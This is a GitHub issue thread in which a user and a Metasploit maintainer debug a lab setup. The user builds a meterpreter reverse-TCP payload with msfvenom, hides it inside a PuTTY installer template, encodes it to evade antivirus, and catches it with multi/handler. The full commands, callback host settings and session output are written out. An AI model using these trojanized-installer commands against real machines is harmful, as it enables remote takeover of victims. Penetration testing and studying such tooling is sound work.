Problem with meterpreter and msfvenom

[John33000]

Steps to reproduce

Metasploit 4.0.5, Alpha E Kali Linux 4.19.0-kali4-amd64

Target VM : Windows 10 How'd you do it?

1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows-x putty-64bit-0.71-installer.msi -f exe-only LHOST=192.168.37.206 LPORT=4444 -o /root/Bureau/Somthing32.exe -e x86/shikata_ga_nai -i 5

2. Use exploit multi/handler

3. set payload windows/meterpreter/reverse_tcp

4. set LPORT 4444

5. SET LHOST 192.168.37.206

6. exploit

7. msf5 exploit(multi/handler) > exploit

[] Started reverse TCP handler on 192.168.37.206:4444 [] Sending stage (179779 bytes) to 192.168.37.137 [] Meterpreter session 3 opened (192.168.37.206:4444 -> 192.168.37.137:49780) at 2019-06-20 16:53:31 +0200 [] 192.168.37.137 - Meterpreter session 3 closed. Reason: Died

and nothing, I can't write just cancel with ctrl+C.

I try 3 time it's for this there are 3 sessions

[bwatters-r7]

The name of your template file appears to indicate it has a 64-bit PE header, but the payload you are inserting is x86?

[John33000]

Yes I follow a youtube video and tutorial and he do this and it's working

[bwatters-r7]

Would you be willing to send us the link to the video?

[John33000]

https://resources.infosecinstitute.com/how-to-attack-windows-10-machine-with-metasploit-on-kali-linux/#comment-1245429

https://resources.infosecinstitute.com/antivirus-evasion-tools/

https://connect.ed-diamond.com/MISC/MISC-081/Contournement-antiviral-avec-Metasploit-encrypter

Sorry no video youtube, I follow these 3 links today and nothing worked ...

I try too Windows 7 without windows defender or firewall and .. Nothing too

I used too shellter for build the payload and same error

[bwatters-r7]

In the last link they are using a template, and they are specifically using an x86 exe file as the template. Above, you are using what appears to be a 64-bit msi file.

The behavior you are seeing is exactly what I would have expected when you try to run a 32-bit stage in a 64 bit process. You're getting a callback from your stager, but then you're injecting x86 shellcode into an x64 process, and the process crashes. A quick change you could try is to use a 64 payload rather than a 32 bit payload. I am not completely confident in the details of the exe vs msi architecture, but it might not hurt to change your output format to match the msi that you are using as the template, too.

[John33000]

It's impossible to create template in 64-bit ? Meterpreter is in 32 bits, the encoders too.

Ok, I built a payload only in x86, but when I lunch multi/handler, exploit and lunch the .exe nothing happens, no error, no session do you have a idea ?

[bwatters-r7]

You should be able to use a 64-bit template. You would also need to make sure that your payload and handler are also 64-bit. I believe the error you had above was not maintaining a consistent architecture. Since you were using a 32-bit payload and handler, the easiest change seemed like using a 32-bit template. If you wanted to change your payload and handler to 64-bit, it should work (but be mindful of the exe/msi formats).

In the case of launching the exploit with no results, is it possible that the AV caught it? Can you examine the logs on the machine running the payload? Specifically, I would check any AV logs and the Windows Application and Security logs. They fill up fast, so check them immediately after running the payload.

[John33000]

Hi, I try with template 64 bits : putty-64bit-0.71-installer.msi (64bits) My Windows 10 it's in 64 bits In msfconsole I use : exploit multi/handler then use payload windows/x64/meterpreter/reverse_tcp

I build payload like this : msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 –-platform windows -x putty-64bit-0.71-installer.msi -k LHOST=192.168.37.206 LPORT=4444 -o something64bit.exe

But in my windows I had this now : "this application can be execute on your PC, for found a version for you PC call your editor"

My AV is windows defender I disabled the service in service.msc, in configuration panel and in gpedit.msc.

[bwatters-r7]

Please try adding -f msi to your command and change your output file from something.exe to something.msi

[John33000]

I'm stupid or what ? I put -f msi at different place and I have the same error :

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload No encoder or badchars specified, outputting raw payload Error: Invalid PE signature "\x17\x02\x10V"

and if I remove -f msi the generation of payload work.

I lunch the payload.msi in my Windows 10 and I have error : Impossible to open this installation package. Check with your application reseller that this Windows Installer package is valid

I'm lost really :( it's simple payload ... Every tutorial do this what's wrong with me ?

[bwatters-r7]

My apologies; after digging in the code with @acammack-r7, it looks like we don't support msi files as templates. You can still use exe files as templates, though.

[John33000]

Hi, Okey thank you, I will try. I have a other problem with metasploit-framework, I do a other issue or I can say the problem here ?

[John33000]

When I lunch the .exe in my Windows nothing happen same thing in Metasploit I don't have error or other. just nothing .. Every AV is disable.

msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 –-platform windows -f exe -x Téléchargements/putty.exe -k LHOST=192.168.37.208 LPORT=4444 -o something64bit.exe

msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.37.208 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port